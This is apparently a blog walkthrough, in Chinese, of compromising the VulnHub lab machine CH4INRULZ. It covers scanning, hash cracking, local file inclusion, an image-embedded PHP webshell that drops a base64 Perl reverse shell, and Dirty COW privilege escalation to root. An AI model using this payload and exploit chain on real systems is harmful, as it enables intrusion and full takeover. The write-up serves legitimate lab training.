[游戏开发]VulnHub靶场之CH4INRULZ_v1.0.1

下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova

主机发现

netdiscover -i eth0 -r 192.168.1.0/24

端口信息探测

nmap -p 1-65535 -vv -sC 192.168.1.21

80和8011，22，21开放，先访问80端口

扫描web目录

gobuster dir -u http://192.168.1.21/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt  -x bak,zip,rar -t 50

扫到了一个备份文件index.html.bak还有一个development 页面
备份的内容

<html><body><h1>It works!</h1>
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
<a href="/development">development</a>
<!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
</body></html>
                 

将 frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0这段保存下来很明显是密码
vi pass.txt
用john解密
john pass.txt,解出来是frank!!!

访问development页面需要登录刚好就是我们解出来的，就是一个文件上传页面

这里根据提示后面还有一个目录uploader

这里经过测试只能上传图片，转到端口8011测试

web目录扫描

gobuster dir -u http://192.168.1.21:8011/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt  -x bak,zip,rar -t 50  

这里扫到一个api目录
这里经过测试只有files_api.php有用

还需要传入一个参数file,这里经过测试为post方式提交这里是个文件包含，可以直接包含/etc/passwd

这里想的是上传一个可以反弹shell的图片马然后直接包含就能执行了

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "your IP"; 
$yourport = 'your port'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?> 

找一找图片用notp++打开把这段代码复制在最后一行，这里的$yourip $yourpor需要自行修改

直接上传成功

读取apache配置文件 /etc/apache2/sites-enabled/000-default

知道了路劲为/var/www/development,尝试读取upload.php的源码

file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php

将得到的数据进行base64解密得出源码

$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>

可以看出我们上传到了FRANKuploads/目录直接访问就看到了

在kali下nc -lvvp 6666 ，监听本地的6666端口
直接包含木马文件
/var/www//development/uploader/FRANKuploads/10.jpg

使用python虚拟化一个shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
上传辅助提权脚本
linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
可以使用脏牛提权

searchsploit Dirty

使用40830.c
/usr/share/exploitdb/exploits/linux/local/40839.c
上传到服务器编译运行

gcc -pthread 40839.c -o dirty -lcrypt
./dirty

输入密码123456

成功创建firefart’用户密码为123456切换用户
su firefart’
为root权限

创作打卡挑战赛

赢取流量/现金/CSDN周边激励大奖